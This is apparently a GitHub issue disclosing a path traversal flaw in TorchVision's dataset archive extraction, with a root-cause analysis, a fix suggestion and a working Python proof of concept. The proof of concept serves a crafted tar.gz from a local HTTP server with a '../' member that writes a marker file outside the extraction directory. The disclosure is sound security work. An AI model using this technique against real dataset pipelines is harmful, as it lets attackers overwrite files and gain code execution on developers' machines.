Skip to content

Path traversal in TorchVision dataset archive extraction #9517

Description

@quart27219

🐛 Describe the bug

RCA

def download_and_extract_archive(
    url: str,
    download_root: Union[str, pathlib.Path],
    extract_root: Optional[Union[str, pathlib.Path]] = None,
    filename: Optional[Union[str, pathlib.Path]] = None,
    md5: Optional[str] = None,
    remove_finished: bool = False,
) -> None:
    ...
    download_url(url, download_root, filename, md5)

The source is the caller-provided url. The helper downloads the remote archive into the local dataset cache.

archive = os.path.join(download_root, filename)
extract_archive(archive, extract_root, remove_finished)

The downloaded archive is propagated directly into the extraction helper.

def _extract_tar(from_path, to_path, compression):
    with tarfile.open(from_path, f"r:{compression[1:]}" if compression else "r") as tar:
        tar.extractall(to_path)

The sink is tar.extractall(to_path). There is no invariant that checks each member's resolved path remains under to_path, and symlink or hardlink members are not rejected before extraction.

PoC

import importlib.util
import io
import pathlib
import sys
import tarfile
import tempfile
import threading
import types
from http.server import BaseHTTPRequestHandler, HTTPServer


def load_torchvision_dataset_utils(repo_root: pathlib.Path):
    class DummyTqdm:
        def __init__(self, *args, **kwargs):
            pass

        def __enter__(self):
            return self

        def __exit__(self, *args):
            return False

        def update(self, *args, **kwargs):
            pass

    torch = types.ModuleType("torch")
    torch.Tensor = object
    torch_utils = types.ModuleType("torch.utils")
    model_zoo = types.ModuleType("torch.utils.model_zoo")
    model_zoo.tqdm = DummyTqdm
    torch_utils.model_zoo = model_zoo
    torch.utils = torch_utils
    sys.modules["torch"] = torch
    sys.modules["torch.utils"] = torch_utils
    sys.modules["torch.utils.model_zoo"] = model_zoo

    pkg = types.ModuleType("torchvision")
    pkg.__path__ = []
    datasets_pkg = types.ModuleType("torchvision.datasets")
    datasets_pkg.__path__ = []
    internal = types.ModuleType("torchvision._internally_replaced_utils")
    internal._download_file_from_remote_location = lambda *args, **kwargs: None
    internal._is_remote_location_available = lambda: False
    sys.modules["torchvision"] = pkg
    sys.modules["torchvision.datasets"] = datasets_pkg
    sys.modules["torchvision._internally_replaced_utils"] = internal

    utils_path = repo_root / "torchvision" / "datasets" / "utils.py"
    spec = importlib.util.spec_from_file_location("torchvision.datasets.utils", utils_path)
    module = importlib.util.module_from_spec(spec)
    sys.modules[spec.name] = module
    spec.loader.exec_module(module)
    return module


class MaliciousTarHandler(BaseHTTPRequestHandler):
    def log_message(self, *args):
        pass

    def do_HEAD(self):
        self.send_response(200)
        self.send_header("Content-Length", "1")
        self.end_headers()

    def do_GET(self):
        body_io = io.BytesIO()
        with tarfile.open(fileobj=body_io, mode="w:gz") as tar:
            inside_data = b"ok\n"
            inside = tarfile.TarInfo("inside.txt")
            inside.size = len(inside_data)
            tar.addfile(inside, io.BytesIO(inside_data))

            marker_data = b"TORCHVISION_PATH_TRAVERSAL_CONFIRMED\n"
            marker = tarfile.TarInfo("../torchvision_variant_marker")
            marker.size = len(marker_data)
            tar.addfile(marker, io.BytesIO(marker_data))

        body = body_io.getvalue()
        self.send_response(200)
        self.send_header("Content-Type", "application/gzip")
        self.send_header("Content-Length", str(len(body)))
        self.end_headers()
        self.wfile.write(body)


def main():
    repo_root = pathlib.Path(sys.argv[1] if len(sys.argv) > 1 else ".").resolve()
    dataset_utils = load_torchvision_dataset_utils(repo_root)

    with tempfile.TemporaryDirectory() as temp_dir:
        server = HTTPServer(("127.0.0.1", 0), MaliciousTarHandler)
        thread = threading.Thread(target=server.serve_forever, daemon=True)
        thread.start()
        try:
            download_root = pathlib.Path(temp_dir) / "download"
            extract_root = pathlib.Path(temp_dir) / "extract"
            url = f"http://127.0.0.1:{server.server_port}/dataset.tar.gz"
            dataset_utils.download_and_extract_archive(
                url,
                str(download_root),
                str(extract_root),
                filename="dataset.tar.gz",
            )
        finally:
            server.shutdown()
            thread.join(timeout=2)

        marker = pathlib.Path(temp_dir) / "torchvision_variant_marker"
        print(f"inside_exists={(extract_root / 'inside.txt').exists()}")
        print(f"traversal_marker_exists={marker.exists()}")
        if marker.exists():
            print(marker.read_text().strip())


if __name__ == "__main__":
    main()

Impact

An attacker who can control a dataset archive URL or an archive supply path consumed by TorchVision dataset utilities can write files outside the intended extraction directory. In ML development, notebook, CI, or training environments, this can overwrite dataset cache files, project files, Python modules, or configuration files and may lead to code execution during later import, training, or evaluation steps.

Suggested Fix

Apply the same invariant used by the Keras fix for CVE-2025-12060: never extract untrusted tar members until their resolved output path is proven to remain under the destination directory. Reject absolute paths, .. traversal, symlinks, and hardlinks unless they are explicitly required and safely resolved.

For Python versions that support it, use tar extraction filters such as filter="data" together with explicit destination containment checks. Zip extraction should receive the same containment validation for member names.

Versions

TorchVision 0.27 Release

Metadata

Metadata

Assignees

No one assigned

    Labels

    No labels
    No labels

    Type

    No type
    No fields configured for issues without a type.

    Projects

    No projects

    Milestone

    No milestone

    Relationships

    None yet

    Development

    No branches or pull requests

    Issue actions